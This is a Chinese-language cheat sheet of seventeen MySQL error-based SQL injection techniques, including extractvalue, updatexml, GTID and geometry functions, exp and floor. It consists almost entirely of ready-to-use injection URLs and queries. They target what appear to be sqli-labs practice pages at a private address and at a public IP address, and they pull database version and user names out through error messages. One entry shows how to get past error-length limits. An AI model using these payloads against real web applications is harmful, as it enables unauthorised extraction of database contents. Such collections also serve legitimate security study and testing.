- 1.extractvalue报错注入
- 2.updatexml报错注入
- 3.ST_LatFromGeoHash()报错注入
- 4.ST_LongFromGeoHash()报错注入
- 5.GTID_SUBSET()报错注入
- 6.GTID_SUBTRACT()报错注入
- 7.ST_PointFromGeoHash()报错注入
- 8.polygon()报错注入
- 9.exp()报错注入
- 10.multipoint()报错注入
- 11.geometrycollection()报错注入
- 12.multipolygon()报错注入
- 13.linestring()报错注入
- 14.multilinestring()报错注入
- 15.floor()报错注入
- 16.NAME_CONST()注入
- 17.利用!来溢出报错注入
1.extractvalue报错注入
http://192.168.64.135//sqlib/Less-1/index.php?id=1' and (extractvalue(1,concat(0x3a,version())),1)--+
SELECT EXTRACTVALUE(0,CONCAT(hex(hex(version())),repeat(0,500),'.'));
报错长度绕过
http://43.247.91.228:84/Less-1/?id=1' and EXTRACTVALUE(0,CONCAT(hex(hex(version())),repeat(0,500),'.'))--+
hex解码两次
2.updatexml报错注入
http://192.168.64.135//sqlib/Less-1/index.php?id=1' and updatexml(1,concat(0x3a,version()),3)--+
sql语句
SELECT * FROM users WHERE id='1' and updatexml(1,concat(0x3a,version()),3)-- ' LIMIT 0,1
3.ST_LatFromGeoHash()报错注入
MariaDB 5.5.65不支持此报错注入,MySQL5.0,5.1和5.5中都没有
[root@localhost ~]# mysql --version
mysql Ver 15.1 Distrib 5.5.65-MariaDB, for Linux (x86_64) using readline 5.1
mysql 5.7支持报错注入,
select ST_LatFromGeoHash(user());
select ST_LatFromGeoHash(version());
4.ST_LongFromGeoHash()报错注入
mysql 5.7支持报错注入
select ST_LongFromGeoHash(version());
select ST_LongFromGeoHash(user());
5.GTID_SUBSET()报错注入
select GTID_SUBSET(version(),1);
select GTID_SUBSET(user(),1);
6.GTID_SUBTRACT()报错注入
select GTID_SUBTRACT(version(),1);
select GTID_SUBTRACT(user(),1);
7.ST_PointFromGeoHash()报错注入
select ST_PointFromGeoHash(version(),1);
select ST_PointFromGeoHash(user(),1);
8.polygon()报错注入
http://43.247.91.228:84/Less-1/?id=1' and polygon((select * from(select * from(select user())a)b))--+
9.exp()报错注入
http://43.247.91.228:84/Less-1/?id=1' and exp(~(select * from(select user())a))--+
10.multipoint()报错注入
http://43.247.91.228:84/Less-1/?id=1' and multipoint((select * from(select * from(select version())a)b))--+
11.geometrycollection()报错注入
http://43.247.91.228:84/Less-1/?id=1' and geometrycollection((select * from(select * from(select user())a)b))--+
12.multipolygon()报错注入
http://43.247.91.228:84/Less-1/?id=1' and multipolygon((select * from(select * from(select user())a)b))--+
13.linestring()报错注入
http://43.247.91.228:84/Less-1/?id=1' and linestring((select * from(select * from(select user())a)b))--+
14.multilinestring()报错注入
http://43.247.91.228:84/Less-1/?id=1' and multilinestring((select * from(select * from(select user())a)b))--+
15.floor()报错注入
http://43.247.91.228:84/Less-1/?id=1' and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
16.NAME_CONST()注入
http://43.247.91.228:84/Less-1/?id=1'union select 1,2,3 from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x --+
17.利用!来溢出报错注入
http://43.247.91.228:84/Less-5/?id=1%27%20union%20select%20(!(select%20*%20from%20(select%20user())x)%20-%20~0),2,3--+